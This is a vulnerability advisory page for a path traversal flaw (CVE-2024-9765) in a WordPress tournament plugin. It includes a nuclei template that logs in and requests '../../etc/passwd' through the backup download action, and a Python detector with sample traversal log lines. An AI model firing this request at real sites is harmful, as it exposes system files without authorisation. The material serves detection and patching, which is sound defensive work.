
EKC Tournament Manager WordPress plugin - Path Traversal

03 Jul 2026 13:39:16
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com

Path traversal in EKC Tournament Manager plugin below 2.2.2 lets logged-in admins download files.

Related

Reporter | Title | Published | Family
Circl | CVE-2024-9765 | 16 May 2025 20:34 | circl
CNNVD | WordPress plugin EKC Tournament Manager security vulnerability | 15 May 2025 00:00 | cnnvd
CVE | CVE-2024-9765 | 15 May 2025 20:07 | cve
Cvelist | CVE-2024-9765 EKC Tournament Manager < 2.2.2 - Local File Download Vulnerability | 15 May 2025 20:07 | cvelist
EUVD | EUVD-2025-15201 | 3 Oct 2025 20:07 | euvd
NVD | CVE-2024-9765 | 15 May 2025 20:16 | nvd
Patchstack | WordPress EKC Tournament Manager plugin < 2.2.2 - Admin+ Arbitrary File Download vulnerability | 19 May 2025 03:59 | patchstack
Positive Technologies | PT-2025-21550 | 15 May 2025 00:00 | ptsecurity
RedhatCVE | CVE-2024-9765 | 17 May 2025 21:03 | redhatcve
Vulnrichment | CVE-2024-9765 EKC Tournament Manager < 2.2.2 - Local File Download Vulnerability | 15 May 2025 20:07 | vulnrichment

id: CVE-2024-9765

info:
  name: EKC Tournament Manager WordPress plugin - Path Traversal
  author: Sourabh-Sahu
  severity: medium
  description: |
    EKC Tournament Manager WordPress plugin < 2.2.2 contains a path traversal caused by insufficient validation, letting logged in admin users download system files outside the WordPress directory.
  impact: |
    Logged in admin users can download arbitrary system files, potentially exposing sensitive information.
  remediation: |
    Upgrade to version 2.2.2 or later.
  reference:
    - https://wpscan.com/vulnerability/c86157b0-43f3-4e82-9697-7dd9401b48d6/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-9765
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.01414
    epss-percentile: 0.69472
    cpe: cpe:2.3:a:lukashuser:ekc_tournament_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: lukashuser
    product: ekc_tournament_manager
  tags: cve,cve2024,lukashuser,ekc-tournament-manager,authenticated,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=ekc-backup&action=download&backup=../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
        condition: and
# digest: 4a0a00473045022100e6834ac66c093ed7f65a160720823b2dd64dad0a77c5ac397b85ff13ecf70e5f0220665657bdddd1d4711f0ffbd58095b72b84771edd5125bf3ea9d880f1217126bf:922c64590222798bb761d5b6d8e72950
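
For sites that cannot be upgraded to 2.2.2 immediately, the request shape in the template above can be hunted in web server access logs. The following is an added example, not part of the nuclei template or the plugin's code; it assumes combined-format access logs, and the sample log lines and the backup file name in them are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded separators are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the decoded value has a '..' segment, is absolute, or has a NUL."""
    name = decode_fully(value).replace("\\", "/")
    return ".." in name.split("/") or name.startswith("/") or "\x00" in name

def flag_line(line):
    """Return the decoded backup value for a traversal request to the
    ekc-backup download action, or None for any other line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # decodes once
    if "ekc-backup" not in params.get("page", []):
        return None
    if "download" not in params.get("action", []):
        return None
    for value in params.get("backup", []):
        if is_traversal(value):
            return decode_fully(value)
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    return [(i, hit) for i, line in enumerate(lines, 1) if (hit := flag_line(line))]

# Constructed sample log lines (documentation IP range, invented file name).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /wp-admin/admin.php?page=ekc-backup&action=download&backup=backup-2025-01-01.zip HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2025:10:00:05 +0000] "GET /wp-admin/admin.php?page=ekc-backup&action=download&backup=../../../../etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.7 - - [01/Jan/2025:10:00:09 +0000] "GET /wp-admin/admin.php?page=ekc-backup&action=download&backup=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1843',
    '203.0.113.7 - - [01/Jan/2025:10:00:12 +0000] "GET /wp-admin/admin.php?page=other&file=../x HTTP/1.1" 200 10',
]
```

Because the flaw requires an authenticated admin session, a hit from `scan()` is also a reason to review that account's recent logins.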

23 Feb 2026 05:00 (current)
Vulners AI Score: 5.9 (Medium risk)
CVSS 3.1: 6.5
EPSS: 0.01414